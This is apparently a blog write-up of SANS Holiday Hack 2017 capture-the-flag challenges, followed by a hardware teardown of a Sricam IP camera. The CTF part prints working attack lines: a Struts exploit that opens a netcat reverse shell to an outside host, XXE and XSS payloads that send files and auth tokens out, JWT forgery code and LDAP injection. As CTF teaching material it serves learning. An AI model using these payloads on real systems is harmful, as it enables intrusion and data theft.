You will need to write your own code, but only a line or two.
total 88
-rwxr-xr-x 1 root root 84824 Dec 16 16:56 isit42
-rw-r--r-- 1 root root   654 Dec 16 16:56 isit42.c.un

There is a file given that includes the important parts of the binary:

#include <stdio.h>
// DATA CORRUPTION ERROR
// MUCH OF THIS CODE HAS BEEN LOST
// FORTUNATELY, YOU DON'T NEED IT FOR THIS CHALLENGE
// MAKE THE isit42 BINARY RETURN 42
// YOU'LL NEED TO WRITE A SEPERATE C SOURCE TO WIN EVERY TIME
int getrand() {
    srand((unsigned int)time(NULL)); 
    printf("Calling rand() to select a random number.\n");
    // The prototype for rand is: int rand(void);
    return rand() % 4096; // returns a pseudo-random integer between 0 and 4096
}
int main() {
    sleep(3);
    int randnum = getrand();
    if (randnum == 42) {
        printf("Yay!\n");
    } else {
        printf("Boo!\n");
    }
    return randnum;
}

With the hint from SANS Blog it was obvious that I can use LD_PRELOAD to overwrite standard libc functions. overwrite_getrand.c :

#include <stdio.h>
int rand() {
return 4138;
}

When compiling you have to use specific flags:

$ gcc overwrite_getrand.c -o overwrite_getrand -shared -fPIC

shared will create a shared library
fPIC is used to create position independent code This will make sure it overwrites functions from other shared libraries. When executing it will now output the right value.
```
LD_PRELOAD="$PWD/overwrite_getrand" ./isit42
```

Kill santaslittlehelperd Sparkle Redberry

Sparkle will give you a very easy and hard task, too, when you are not looking into the right files.

My name is Sparkle Redberry, and I need your help.
My server is atwist, and I fear I may yelp.
Help me kill the troublesome process gone awry.
I will return the favor with a gift before nigh.
Kill the "santaslittlehelperd" process to complete this challenge.

elf@efae06a0bf5f:~$ ps -fax
  PID TTY      STAT   TIME COMMAND
pts/0    Ss     0:00 /bin/bash /sbin/init
pts/0    S      0:00 /usr/bin/santaslittlehelperd
pts/0    S      0:00 /sbin/kworker
pts/0    S      0:00  \_ /sbin/kworker
pts/0    S      0:00 /bin/bash
pts/0    R+     0:00  \_ ps -fax

After some damning about this task because of it simplicity I got the problem. All popular commands to kill processes have aliases to prevent actually killing anything. That feels like monkeyshines for admins.

elf@efae06a0bf5f:~$ alias
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias kill='true'
alias killall='true'
alias l='ls -CF'
alias la='ls -A'
alias ll='ls -alF'
alias ls='ls --color=auto'
alias pkill='true'
alias skill='true'

With this knowledge I used “top” and pressed k to kill the process. Afterwards you have to refresh the page to solve it silently.

Execute elftalkd Bushy Evergreen

Bushy wants you to find a executable. When you are familiar with grep this is very easy.

My name is Bushy Evergreen, and I have a problem for you.
I think a server got owned, and I can only offer a clue.
We use the system for chat, to keep toy production running.
Can you help us recover from the server connection shunning?
Find and run the elftalkd binary to complete this challenge.

When using grep with recursive option on the system root you can find it easily.

elf@11cb77f0b8ea:~$ grep -rli elftalkd / 2>/dev/null | grep elftalk
/run/elftalk/bin/elftalkd

Starting ARM Train binary Pepper Minstix

Seeing a nice ASCII train Pepper would like you to execute a given binary.

My name is Pepper Minstix, and I need your help with my plight.
I've crashed the Christmas toy train, for which I am quite contrite.
I should not have interfered, hacking it was foolish in hindsight.
If you can get it running again, I will reward you with a gift of delight.


total 444
-rwxr-xr-x 1 root root 454636 Dec  7 18:43 trainstartup

It’s executable by anyone but it’s the architecture that matters:

elf@bdaf2542fc01:~$ file trainstartup 
trainstartup: ELF 32-bit LSB  executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=005de4685e8563d10b3de3e0be7d6fdd7ed732eb, not stripped

My first thought is emulation and I guess thats the intended solution:

elf@bdaf2542fc01:~$ /usr/bin/qemu-arm trainstartup 
Starting up ...

Execute File without Permissions Holly Evergreen

Hollys challenge will ask you to execute a file.

My name is Holly Evergreen, and I have a conundrum.
I broke the candy cane striper, and I'm near throwing a tantrum.
Assembly lines have stopped since the elves can't get their candy cane fix.
We hope you can start the striper once again, with your vast bag of tricks.
Run the CandyCaneStriper executable to complete this challenge.

The desired file isn’t owned by your user:

elf@a986aaa7e476:~$ ls -la
total 68
drwxr-xr-x 1 elf  elf   4096 Dec 15 20:00 .
drwxr-xr-x 1 root root  4096 Dec  5 19:31 ..
-rw-r--r-- 1 elf  elf    220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 root root  3143 Dec 15 19:59 .bashrc
-rw-r--r-- 1 elf  elf    655 May 16  2017 .profile
-rw-r--r-- 1 root root 45224 Dec 15 19:59 CandyCaneStriper

As it is allowed to read the file and we can use encoding utilities like base64 we can simply copy the content into a new file and execute it.

elf@a986aaa7e476:~$ cat CandyCaneStriper | base64 > CandyCaneStriper_base64
elf@a986aaa7e476:~$ cat CandyCaneStriper_base64 | base64 -d > CandyCaneStriper_elf
elf@a986aaa7e476:~$ cp /bin/touch test_file
elf@a986aaa7e476:~$ cp CandyCaneStriper_elf test_file

Extract Information Minty Candycane

Minty gives us a http server log and wants us to find the least popular one:

Minty Candycane here, I need your help straight away.
We're having an argument about browser popularity stray.
Use the supplied log file from our server in the North Pole.
Identifying the least-popular browser is your noteworthy goal.

Maybe there are more elegant ways to exclude information progressively but it was the easiest way at first glance:

cat access.log | grep -v -i facebook | grep -v -i mozilla | grep -v -i safari | grep -v -i zmeu | grep -v -i slack | grep -v -i sysscan | grep -v -i googlebot | grep -v -i twitter | grep -v -i wget | grep -v -i masscan | grep -v -i python 

After excluding a lot of browser entries I found the one, that occurs only a single time. I never heard of it: Dillo

Edit Shadow without Rights Shinny Upatree

Shinny wants you to edit the shadow file without the needed permissions:

My name is Shinny Upatree, and I've made a big mistake.
I fear it's worse than the time I served everyone bad hake.
I've deleted an important file, which suppressed my server access.
I can offer you a gift, if you can fix my ill-fated redress.
Restore /etc/shadow with the contents of /etc/shadow.bak, then run "inspect_da_box" to complete this challenge.

When inspecting the sudoers file it occurs that my user is allowed to run find with shadow group rights. As find allows many exec operations on top it’s easy to cook a bash command:

sudo -g shadow find /etc/ -type f -name shadow.bak -exec /bin/cp {} /etc/shadow \;

Inspecting christmassongs.db Sugarplum Mary

Sugarplum would like you to do some SQL queries to find the most popular christmas song.

Sugarplum Mary is in a tizzy, we hope you can assist.
Christmas songs abound, with many likes in our midst.
The database is populated, ready for you to address.
Identify the song whose popularity is the best.
total 20684
-rw-r--r-- 1 root root 15982592 Nov 29 19:28 christmassongs.db
-rwxr-xr-x 1 root root  5197352 Dec  7 15:10 runtoanswer

Inspecting the database file and its tables it will reveal it’s structure. You have to count the likes depending on a given songid:

elf@907587d5d549:~$ sqlite3 christmassongs.db 
SQLite version 3.11.0 2016-02-15 17:29:24
Enter ".help" for usage hints.
sqlite> .schema
CREATE TABLE songs(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  title TEXT,
  artist TEXT,
  year TEXT,
  notes TEXT
);
CREATE TABLE likes(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  like INTEGER,
  datetime INTEGER,
  songid INTEGER,
  FOREIGN KEY(songid) REFERENCES songs(id)
);

You can do this with the HAVING syntax. It gives you the possibility to count all columns for a given value like==1 and songid:

sqlite> SELECT like,songid,COUNT(*) c FROM likes where like==1 GROUP BY songid HAVING c > 1700 limit 100;
90|1715
98|1706
134|1719
199|1702
245|1756
265|1720
392|8996

Querying this songid from the second table gives us the songs name:

select title,id from songs where id=392;
Stairway to Heaven|392

2 Apache Struts Server

Task: 2) Investigate the Letters to Santa application at . What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball’s password?

Sparkle Redberry gives a lot of hints about this tasks. It’s very important to get this because all the other servers are only accessible internally over this one. We can summarize the hints from Sparkle:

Sometimes development content won’t be deleted in production state of websites
Alabaster, the admin, uses Apache Struts
Backdoors and webshells are good to access system remotely
Example for simple PHP webshell and Link
Some silly developers leave hardcoded credentials behind
Isn’t vulnerable against CVE-2017-5638
Special character issues of XML and how to avoid them for exploiting with Link

SiteScreenshot

Following the first hint I inspect the source code of the site:

</body> 
    <!-- Development version -->
    <a href="http://dev.northpolechristmastown.com" style="display: none;">Access Development Version</a>
    <script>

Nmapping both servers reveals that it’s the same machine with multiple webservers serving different subdomains.

$ nmap l2s.northpolechristmastown.com

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-12 22:05 CET
Nmap scan report for l2s.northpolechristmastown.com (35.185.84.51)
Host is up (0.093s latency).
rDNS record for 35.185.84.51: 51.84.185.35.bc.googleusercontent.com
Not shown: 994 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
443/tcp  open   https
3389/tcp closed ms-wbt-server
5060/tcp closed sip
5061/tcp closed sip-tls

Nmap done: 1 IP address (1 host up) scanned in 8.86 seconds

$ nmap dev.northpolechristmastown.com

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-12 22:06 CET
Nmap scan report for dev.northpolechristmastown.com (35.185.84.51)
Host is up (0.096s latency).
rDNS record for 35.185.84.51: 51.84.185.35.bc.googleusercontent.com
Not shown: 994 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
443/tcp  open   https
3389/tcp closed ms-wbt-server
5060/tcp closed sip
5061/tcp closed sip-tls

After some research following the hints I decided to use this tool after it’s indicating that this server is vulnerable:

$ python struts-pwn.py --url https://dev.northpolechristmastown.com/orders/

[*] URL: https://dev.northpolechristmastown.com/orders/
[*] Status: Vulnerable!
[%] Done.

After some try and error uploading a webshell I ended up using a simple reverse shell with another but simliar tool.

python struts_xml.py -u https://dev.northpolechristmastown.com/orders/- -c "nc -e /bin/sh federland.dnshome.de 56123"

As this is simple reverse shell is very annoying I was able to upgrade it nearly to a real TTY using this article and this resulting commands:

python -c 'import pty; pty.spawn("/bin/bash")'
$ export PATH=/usr/sbin:/usr/bin:/sbin:/bin

This two commands will give you easy access to all installed utilities and the possibility of using special keys.

As mentioned in the hints, developers will leave credentials behind, you have to look out for developing files like source code or documentation. As Alabaster deploys a Apache Struts server it’s possible he created some java files for a apache tomcat server. Searching the default directory for the tomcat files we can find it:

$ grep -rli password opt

$ cat opt/apache-tomcat/webapps/ROOT/WEB-INF/classes/org/demo/rest/example/OrderMySql.class
            ...
	    final String username = "alabaster_snowball";
            final String password = "stream_unhappy_buy_loss";   
	    ...

3 Network Reconnaisance & SMB Server

Task: 3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?

Therefore my first move was to scan the whole subnet:

nmap 10.142.0.0/24 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-17 14:38 UTC
Nmap scan report for hhc17-l2s-proxy.c.holidayhack2017.internal (10.142.0.2)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
2222/tcp open  EtherNetIP-1

Nmap scan report for hhc17-apache-struts1.c.holidayhack2017.internal (10.142.0.3)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for edb.northpolechristmastown.com (10.142.0.6)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
389/tcp  open  ldap
8080/tcp open  http-proxy

Nmap scan report for hhc17-emi.c.holidayhack2017.internal (10.142.0.8)
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server


Nmap scan report for hhc17-apache-struts2.c.holidayhack2017.internal (10.142.0.11)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

Nmap scan report for eaas.northpolechristmastown.com (10.142.0.13)
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server


Nmap scan report for mail.northpolechristmastown.com (10.142.0.5)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
143/tcp  open  imap
2525/tcp open  ms-v-worlds
3000/tcp open  ppp

The scan from the internal network reveals some machines but none with a open SMB port 445. The elf Holly Evergreen provided some hints for this challenge:

Use the -PS flag of nmap to do TCP Syn Scan on specific ports
Alabaster Snowball uses one strong password and uses it for multiple services
Use ssh portforwarding to work from your machine into the internal network
Use smbclient to communicate with SMB fileshare from linux

Nmap uses the -PS flag by default but only for port 443. When the desired machine doesn’t respond to ICMP probes in addition it won’t be detectable without custom nmap flags. Apply this hint to the subnet scan:

nmap -PS445 10.142.0.0/24

Nmap scan report for hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7)
Host is up (0.00073s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Windows SMB Server

ssh -L 139:10.142.0.7:139 -L 445:10.142.0.7:445 -L 135:10.142.0.7:135 -L 3389:10.142.0.7:3389  [email protected]

smbmap -u alabaster_snowball -p stream_unhappy_buy_loss -d workgroup -H 127.0.0.1 -R
[+] Finding open SMB ports....
[+] User SMB session establishd on 127.0.0.1...
[+] IP: 127.0.0.1:445	Name: localhost                                         
	Disk                                                  	Permissions
	----                                                  	-----------
	ADMIN$                                            	NO ACCESS
	C$                                                	NO ACCESS
	FileStor                                          	READ ONLY
	.\
	dr--r--r--                0 Wed Dec  6 22:51:45 2017	.
	dr--r--r--                0 Wed Dec  6 22:51:45 2017	..
	-r--r--r--           255520 Sun Dec 17 08:33:12 2017	BOLO - Munchkin Mole Report.docx
	-r--r--r--          1275756 Mon Dec  4 21:04:34 2017	GreatBookPage3.pdf
	-r--r--r--           111852 Sun Dec 17 08:31:32 2017	MEMO - Calculator Access for Wunorse.docx
	-r--r--r--           133295 Wed Dec  6 22:47:47 2017	MEMO - Password Policy Reminder.docx
	-r--r--r--            10245 Wed Dec  6 23:28:21 2017	Naughty and Nice List.csv
	-r--r--r--            60344 Wed Dec  6 22:51:47 2017	Naughty and Nice List.docx

smbget -U alabaster_snowball smb://127.0.0.1/FileStor/GreatBookPage3.pdfPassword for [alabaster_snowball] connecting to //FileStor/127.0.0.1: 
Using workgroup WORKGROUP, user alabaster_snowball
smb://127.0.0.1/FileStor/GreatBookPage3.pdf                                                    
Downloaded 1,22MB in 13 seconds

ssh -L 143:10.142.0.5:143  -L  8080:10.142.0.5:80 -L 25:10.142.0.5:25 -L 2222:10.142.0.5:22 -L 2525:10.142.0.5:2525 -L 3000:10.142.0.5:3000  [email protected]

$ dirb http://127.0.0.1:8080

---- Scanning URL: http://127.0.0.1:8080/ ----
+ http://127.0.0.1:8080/index.html (CODE:200|SIZE:11321)                                      
+ http://127.0.0.1:8080/info.php (CODE:200|SIZE:90820)   

./dotdotpwn.pl -m http -h 127.0.0.1 -x 8080 -M GET
[*] HTTP Status: 400 | Testing Path: http://127.0.0.1:8080/..%00%u2216..%00%u2216..%00%u2216..%00%u2216etc%u2216issue
[*] HTTP Status: 400 | Testing Path: http://127.0.0.1:8080/..%00%u2216..%00%u2216..%00%u2216..%00%u2216..%00%u2216etc%u2216passwd

nmap -sV 127.0.0.1 -p 22,25,8080,143,2525,3000

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-20 18:54 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000055s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
25/tcp   open   smtp    Postfix smtpd
143/tcp  open   imap    Dovecot imapd
2525/tcp open   smtp    Postfix smtpd
3000/tcp open   http    Node.js Express framework
8080/tcp open   http    nginx 1.10.3 (Ubuntu)
Service Info: Host:  mail.northpolechristmastown.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel

EWA=”{“name”:”GUEST”,”plaintext”:””,”ciphertext”:””}”

EWA={“name”:”[email protected]”,”plaintext”:””,”ciphertext”:”WmczgfAW8upVlZabYxzEXQ”}

Online Resource Management with XML External Entity (XXE) Vulnerability

ssh -L 8080:10.142.0.13:80 -L 3389:10.142.0.7:3389  [email protected]

cat order.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
    <!ELEMENT demo ANY >
    <!ENTITY % extentity SYSTEM "http://federland.dnshome.de:13337/evil.dtd">
    %extentity;
    %inception;
    %sendit;
    ]
<

cat evil.dtd 
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % stolendata SYSTEM "file:///c:/greatbook.txt">
<!ENTITY % inception "<!ENTITY &#x25; sendit SYSTEM 'http://federland.dnshome.de:13338/?%stolendata;'>">

nc -l 13338
GET /?http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf HTTP/1.1
Host: federland.dnshome.de:13338
Connection: Keep-Alive

Database with XSS Vulnerability, JavaScript Web Token (JWT) Vulnerability and LDAP Injection Vulnerability

ssh -L 18080:10.142.0.6:80  -L 2222:10.142.0.6:22 -L 3890:10.142.0.6:389 -L 28080:10.142.0.6:8080  [email protected]

ldapsearch -h 127.0.0.1 -p 3890 -x -b "dc=northpolechristmastown,dc=com" > edb_ldap_dump.txt

cat edb_ldap_dump.txt | grep "mail:" | cut -d":" -f2 | cut -d"@" -f1 > usernames.txt

XSS

hi plz restore password <IFRAME SRC=# onload="document.getElementsByClassName('ticketlogo tooltipped')[0].setAttribute('src','http://federland.dnshome.de:56123/'+localStorage.getItem('np-auth'))"></IFRAME>

nc -l -p 56123
GET /eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.1
Referer: http://127.0.0.1/reset_request?ticket=W0M50-B1XAN-2L4ND-247NN
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*
Host: federland.dnshome.de:56123

 echo eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I | base64 -d
{"alg":"HS256","typ":"JWT"}...

JWT

pyjwt  ecode --no-verify eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I
Essphrase for key '/root/.ssh/id_rsa': 
nter passphrase for key '/root/.ssh/id_rsa': 
{"dept": "Engineering", "ou": "elf", "expires": "2017-08-16 12:00:47.248093+00:00", "uid": "alabaster.snowball"}

installing jwt-tool installing jwt-cracker

jwt-cracker eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I "abcdefghijklmnopqrstuwxyz" 6

other characters

"abcdefghijklmnopqrstuvwxyz0123456789" 6

using jwt_tool with rockyou.txt

./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I
Secret is "3lv3s"

import jwt
import datetime
import time

JWT = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I"
SECRET_KEY = "3lv3s"

decoded_payload = jwt.decode(jwt=JWT, key=SECRET_KEY)
print(decoded_payload)

decoded_payload["expires"] = str(datetime.datetime.utcnow() + datetime.timedelta(seconds=6000))
print(decoded_payload)

token = jwt.encode(payload=decoded_payload, key=SECRET_KEY)
print("Generated Token: {}".format(token.decode()))

localStorage.setItem('np-auth','eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTEyLTMxIDIyOjQ2OjI1LjM0MDc2OCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.tA3S1ZW6s4Bx9cMvndny454pLYD3C22-JMDkVCERX8E')

curl 	'http://127.0.0.1:28080/search' 
	-H 'Cookie: SESSION=gt60T0q3W0P52h88k001' 
	-H 'Origin: http://127.0.0.1:28080' 
	-H 'Accept-Encoding: gzip, deflate, br' 
	-H 'Accept-Language: en-US,en;q=0.8' 
	-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.104 Safari/537.36' 
	-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' 
	-H 'Accept: */*' -H 'Referer: http://127.0.0.1:28080/home.html' 
	-H 'X-Requested-With: XMLHttpRequest' 
	-H 'Connection: keep-alive' 
	-H 'np-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTEyLTMxIDIyOjQ2OjI1LjM0MDc2OCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.tA3S1ZW6s4Bx9cMvndny454pLYD3C22-JMDkVCERX8E' 
	--data 'name=))(department%3Dit)(%7C(cn%3D&isElf=False&attributes=profilePath%2Cgn%2Csn%2Cmail%2CuserPassword' --compressed

Hacking An IPCamera Part1

2017-10-19T16:00:00+00:00

Sricam SP009 Hardware and Software Examination

Sricam SP009 Hardware and Software Examination

In this gist I will try to examine and exploit the Sricam SP009. I purchased it from Attify with the IOT Exploitation Kit.

First Recon
- doing Research on Manufacturer Details
- disassemble the ip-camera
Access over Harware Ports
- get shell access
- dump the firmware
Acess over Wireless Interfaces and Network
- use interfaces in intended manner and dump network exchange information
- scan network services on cam and servers
Reversing Android App
- finding firmware and keys for further access encryption
- vulnerabilities

1. First Recon

There isn’t any manufactural ID on the Cam. So seaching for the product will probably give the necessary documents. http://www.sricam.com/product/id/07caa85ec45449fabc17c003345970bf.html http://www.sricam.com/download/id/3e984aa70a9d4e928b03c01787d6fb4f.html

I wasn’t able of extracting any relevant FCCID, only for similiar models like SP022.

Product Photo SP009

Examing product without opening it reveals a 720p camera module, IR sensor, LED’s for indicating running system, SD card slot and a reset button. On the backshell of the camera is a sticker with the ID (probably for database issues) and the default password.

Covering with product sticker

Inside view of covering with speaker

On the inner side of the backshell lies a small speaker. It was my first action to plug it off the main board, because it does annoying beeps when not paired with the smartphone app.

The main board reveals all the parts for the functionalities of the cam.

PCB front with assembly of parts

1.1 WiFi

Link: https://www.mediatek.com/products/broadbandWifi/mt7601u
Identifier: MT7601UN 1530-BMJL GTP39Y55

According to mediatek “High-performance 802.11n for compact and cost-effective Wi-Fi devices”. Provides network connectivity for the cam and will communicate with the main processor via SPI.?

1.2 SoC

Link: http://www.grain-media.com/html/8136S_8135S.htm
Identifier: GM8 135S-OC SMSKH-000 AG-1525

SoC architecture

We can see that it’s a ARM architecture and it has a lot of interfaces. Next to the SoC lies the suspected UART interface.

1.3 Flash

Link: http://html.alldatasheet.com/html-pdf/575542/MCNIX/MX25L12835E/1114/7/MX25L12835E.html (similiar model)
Identifier: MX25L12805E (on the chip is MX25L12805D printed)
Name: 16M-BIT [x 1] CMOS SERIAL FLASH

Flash pinout

It’s surprising that although there is printed MX25L12805E, it’s the chip MX25L12805D. They varies in pinning and flash size. This flash stores the operating system and all binaries and other files for operation. Looking later at the booting prompt will reveal it’s real “type”. We will examine later, whether it’s possible to get some information out of the chip via SPI.

1.4 Power Management

Link: http:/A3/www.everanalog.com/Product/ProductEA3036DetailInfo.aspx
Identifier: EA3036 4j088s
Name: 3CH power management IC

Provides the driver circuit for the Power Management. Very Important for function of the cam but not really interesting for examination.

1.5 SD card slot

Looks like a typical reader for microSD cards like used on Raspberry Pi. I guess, it could be used to store videos and pictures, captured by the camera. It will become useful to copy things from the filesystem and maybe executing external binaries.

On the back of the main board are some other parts.

PCB backside

1.6 EEPROM

Link: http://www.celtor.pl/2447,24c04d-eeprom-szeregowa-4kb-512bx-so8.html
Identifier: 24c04d 538b1

Like the Flash it should communicate via SPI with the main processor. The EEPROM stores the Bootloader that will provide the program to load the operating system from the Flash. It’s much smaller with only 16kB. When it’s not possible to read the Flash, I would continue with the EEPROM.

1.7 Audio Amplifier

Link: http://www.inkocean.in/the-md8002a-8002a-sop8-smd-3w-audio-amplifier-ic-chip
Identifier: 8002a swire15

You can find this part on the board two times. It will amplify the audio signal from the DAC to hearable power level. Won’t be in our focus, either.

1.8 Shell

The WiFi antenna is stucked in the front shell of the camera.

Front covering with attached WiFi antenna

Inside this front shell lies this “LED ring” with some status LED’s and the IR sensor for measuring brightness, I guess.

LED circuit back side

LED circuit front side

2. Access over Hardware Ports

2.1 UART

Without taking further measurements, I suspected the three pins in previous picture to be a UART serial port. As the first one has a squareformed joint, it’s supposed to be the GND pin and the two other ones Tx and Rx.

UART Buspirate setup

I examined the ports with a buspirate and beeing sure I have the right ports, I tried all popular baudrates and parity bits:

HiZ>m	#Choose protocol from main buspirate interface
1. HiZ
2. 1-WIRE
3. UART
4. I2C
5. SPI
6. 2WIRE
7. 3WIRE
8. LCD
9. DIO
x. exit(without change)

(1)>3	#taking UART
Set serial port speed: (bps)
 1. 300
 2. 1200
 3. 2400
 4. 4800
 5. 9600
 6. 19200
 7. 38400
 8. 57600
 9. 115200
10. BRG raw value

(1)>9	#taking baudrate 115200
Data bits and parity:
 1. 8, NONE *default 
 2. 8, EVEN 
 3. 8, ODD 
 4. 9, NONE
(1)>	# taking default value "no parity"
Stop bits:
 1. 1 *default
 2. 2
(1)>	# taking default value "no stop bits"
Receive polarity:
 1. Idle 1 *default
 2. Idle 0
(1)>	# is the Rx port high or low when it's idle, taking default
Select output type:
 1. Open drain (H=Hi-Z, L=GND)
 2. Normal (H=3.3V, L=GND)
(1)>	# taking open drain as driver circuit for the port
Ready
UART>v	# checking the Pinout of the BusPirate
Pinstates:
1.(BR)	2.(RD)	3.(OR)	4.(YW)	5.(GN)	6.(BL)	7.(PU)	8.(GR)	9.(WT)	0.(Blk)
GND	3.3V	5.0V	ADC	VPU	AUX	-	TxD	-	RxD
P	P	P	I	I	I	I	I	I	I	
GND	0.00V	0.00V	0.00V	0.00V	L	L	L	L	L	

UART>(2) # choosing mode to only receive output
Raw UART input
Any key to exit
>�ʛ���s�Ϲܒ`���e����k��������������ʗ���0�����������������컚�Ϙ�ߚЛ�������������%�������i���C�������q ��q����"�c9�a�":�i���C�������q ��q����"�c9�a�"���i���C�������q ��q����"�c9�a�"���i��
...
q ��)���"��c9ñ":��C��������q ;�)���"�c9ñ":��C��������q ;�)���"�c9ñ":�i

Trying all different baudrates and parity bits didn’t give any better result. With a hint of https://twitter.com/adi1391 (course instructor) it was easy. The square pin isn’t GND, it’s RX (RX,GND,TX) with baudrate of 115200. I don’t know whether it’s the desired behaviour or a bug. In every case it will create some confusion.

UART soldering

So first lesson learned: Never trust in habits. With this pinning I was able to get readable output and furthermore a shell with Root Rights but the whole file system is mounted only as readable. For the sake of readabilty I will put booting output into external link.

Booting Stdout

It gives some interesting information:

The flash isn’t complying (like I mentioned before) with it’s printing. It’s 16MB in size. Enough to hold a whole flash firmware.
Flash software is iJFFS2 version 2.2. (NAND) from Red Hat

Flash communicates via SPI and creates 6 partitions on the flash

SPI_FLASH spi0.0: MX25L12845E (16384 Kbytes)
Creating 6 MTD partitions on "nor-flash":
0x000000010000-0x000000080000 : "UBOOT"
0x000000080000-0x000000380000 : "LINUX"
0x000000380000-0x000000b00000 : "FS"
0x000000b00000-0x000000c00000 : "USER0"
0x000000c00000-0x000001000000 : "USER1"
0x000000000000-0x000001000000 : "ALL"

OS runs Linux RTOS with busybox on squashfs filesystem and library relies on microClib (important for executing external binaries)
DRAM is 64 MiB

we have USB interfaces (probably for the SD Card Reader)

Drive Vbus because of ID pin shows Device A
fotg210 fotg210.0: FOTG2XX
fotg210 fotg210.0: new USB bus registered, assigned bus number 1
fotg210 fotg210.0: irq 9, io mem 0x93000000
fotg210 fotg210.0: USB 2.0 started, EHCI 1.00
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected

there is a I2C bus

i2c /dev entries driver
